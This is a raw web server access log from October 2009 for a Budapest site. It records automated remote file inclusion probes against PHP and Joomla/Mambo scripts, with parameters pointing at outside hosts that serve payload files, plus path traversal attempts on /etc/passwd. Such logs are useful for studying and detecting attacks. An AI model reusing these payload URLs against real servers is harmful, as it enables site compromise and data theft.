207.14.32.241 - - [31/Oct/2009:20:33:53 -0700] "GET /logs/index_principal.php?pagina=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
207.14.32.241 - - [31/Oct/2009:20:33:53 -0700] "GET /index_principal.php?pagina=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
207.14.32.241 - - [31/Oct/2009:20:34:03 -0700] "GET /logs/access_090329.log%20%20/index_principal.php?pagina=http://nuhalka.ru/senux/id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:20:34:36 -0700] "GET /index_principal.php?pagina=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:20:34:36 -0700] "GET /logs/access_090329.log/index_principal.php?pagina=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
74.223.143.131 - - [31/Oct/2009:20:34:36 -0700] "GET /logs/index_principal.php?pagina=http://www.caindeaf.or.kr/bbs/data/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.115.89.97 - - [31/Oct/2009:20:35:52 -0700] "GET /logs/access_090329.log%20%20//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.115.89.97 - - [31/Oct/2009:20:35:52 -0700] "GET /setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.115.89.97 - - [31/Oct/2009:20:35:52 -0700] "GET /logs//setup.php?dir=http://www.babyu.co.kr/babyubbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:20:36:05 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:20:36:09 -0700] "GET /logs/access_090501.log//admin/business_inc/saveserver.php?thisdir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
75.126.218.14 - - [31/Oct/2009:20:36:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:49 -0700] "GET /logs/access_090329.log/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:49 -0700] "GET /index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:49 -0700] "GET /logs/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:53 -0700] "GET /logs/access_090329.log/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:53 -0700] "GET /index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:37:53 -0700] "GET /logs/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:40:37 -0700] "GET /logs/access_090329.log%20%20/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:20:40:41 -0700] "GET /logs/access_090329.log%20%20/index.php?stranica=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:03 -0700] "GET /logs/access_090401.log%20%20/index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:03 -0700] "GET /logs/index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:03 -0700] "GET /index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:24 -0700] "GET /logs/index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:24 -0700] "GET /index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
211.223.201.177 - - [31/Oct/2009:20:42:24 -0700] "GET /logs/access_090401.log%20%20/index2.php?showpage=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [31/Oct/2009:20:49:49 -0700] "GET /logs/access_090329.log//main.php?sayfa=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [31/Oct/2009:20:49:49 -0700] "GET /main.php?sayfa=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [31/Oct/2009:20:49:49 -0700] "GET /logs//main.php?sayfa=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:20:50:26 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:20:50:26 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:20:50:26 -0700] "GET /logs/access_090329.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.228.191.194 - - [31/Oct/2009:20:51:28 -0700] "GET /logs/access_090329.log%20%20//main.php?sayfa=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.175.29.250 - - [31/Oct/2009:20:54:40 -0700] "GET /logs/access_090329.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.175.29.250 - - [31/Oct/2009:20:54:40 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.175.29.250 - - [31/Oct/2009:20:54:40 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:56:32 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:56:32 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:56:32 -0700] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:57:03 -0700] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:57:03 -0700] "GET /bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.73.17.7 - - [31/Oct/2009:20:57:03 -0700] "GET /logs/access.log%20%20//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.11.230.67 - - [31/Oct/2009:20:58:52 -0700] "GET /logs/access_090329.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.11.230.67 - - [31/Oct/2009:20:58:52 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.11.230.67 - - [31/Oct/2009:20:58:52 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:21:00:19 -0700] "GET /logs/access_090329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shchd.co.kr/icon/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.200.95.142 - - [31/Oct/2009:21:07:42 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.200.95.142 - - [31/Oct/2009:21:07:42 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
203.200.95.142 - - [31/Oct/2009:21:07:42 -0700] "GET /logs/access_090329.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.54.23.85 - - [31/Oct/2009:21:09:24 -0700] "GET /logs/access_090329.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.54.23.85 - - [31/Oct/2009:21:09:24 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.54.23.85 - - [31/Oct/2009:21:09:24 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.175.29.250 - - [31/Oct/2009:21:14:19 -0700] "GET /logs/access_090329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
66.11.230.67 - - [31/Oct/2009:21:15:39 -0700] "GET /logs/access_090329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
72.54.23.85 - - [31/Oct/2009:21:17:45 -0700] "GET /logs/access_090329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
216.129.119.12 - - [31/Oct/2009:21:18:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "budapestcapital.com"
66.244.236.249 - - [31/Oct/2009:21:30:04 -0700] "GET /skin/zero_vote/setup.php?dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
203.200.95.142 - - [31/Oct/2009:21:31:05 -0700] "GET /logs/access_090329.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://wedanperformance.com/zencart/images/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.92.156.53 - - [31/Oct/2009:21:38:38 -0700] "GET /logs/access_090329.log/?sourcedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.92.156.53 - - [31/Oct/2009:21:38:38 -0700] "GET /?sourcedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
209.92.156.53 - - [31/Oct/2009:21:38:38 -0700] "GET /logs/?sourcedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:52:30 -0700] "GET /?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:52:30 -0700] "GET /logs/access_090329.log%20%20/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:52:30 -0700] "GET /logs/?sourcedir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 200 3369 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:21:52:52 -0700] "GET /logs/access_090329.log%20%20/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:21:52:52 -0700] "GET /logs/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:21:52:52 -0700] "GET /index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:59:46 -0700] "GET /logs/access_090329.log%20%20/index1.php?=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:59:46 -0700] "GET /logs/index1.php?=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:21:59:46 -0700] "GET /index1.php?=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:21:59:46 -0700] "GET /?p=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 916 "-" "-" "www.budapestcapital.com"
77.221.130.11 - - [31/Oct/2009:21:59:47 -0700] "GET /?p=./../../../../../../../../etc/passwd HTTP/1.1" 200 916 "-" "-" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:01:40 -0700] "GET /logs/access_090329.log%20%20/index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:01:40 -0700] "GET /logs/index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:01:40 -0700] "GET /index1.php?=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:56 -0700] "GET /logs/access.log///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:56 -0700] "GET //dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:56 -0700] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:57 -0700] "GET //dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:57 -0700] "GET /logs/access.log///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:02:57 -0700] "GET /logs///dm-albums/template/album.php?SECURITY_FILE=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:05:35 -0700] "GET /logs/access_090329.log/index1.php?=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:07:29 -0700] "GET /logs/access_090329.log%20%20/noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:07:29 -0700] "GET /logs/noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:07:30 -0700] "GET /logs/access.log%20%20/noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:07:30 -0700] "GET /noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:29 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:29 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:30 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:32 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
93.174.0.17 - - [31/Oct/2009:22:09:32 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://home.jsjhs.tpc.edu.tw:8080//appserv/main_config.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:10:00 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:10:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:10:00 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.122.46.179 - - [31/Oct/2009:22:11:28 -0700] "GET /logs/access_090329.log/index1.php?=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:12:25 -0700] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:12:25 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:12:25 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
67.195.112.125 - - [31/Oct/2009:22:13:05 -0700] "GET /logs/access_090301.log HTTP/1.0" 200 1212992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:13:55 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:13:55 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:13:55 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:15:30 -0700] "GET /logs/access.log/noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
208.89.214.167 - - [31/Oct/2009:22:15:30 -0700] "GET /logs/access_090329.log/noticias.php?arq=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:17:06 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:17:06 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
77.222.131.59 - - [31/Oct/2009:22:17:06 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [31/Oct/2009:22:17:36 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [31/Oct/2009:22:17:36 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
222.236.47.182 - - [31/Oct/2009:22:17:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
69.64.94.64 - - [31/Oct/2009:22:19:47 -0700] "GET /dm-albums/template/album.php?SECURITY_FILE=http://www.thaiantitobacco.com/lamb//copyright?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:19:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:19:56 -0700] "GET /logs/access_090329.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
202.123.212.188 - - [31/Oct/2009:22:19:56 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.budapestcapital.com"
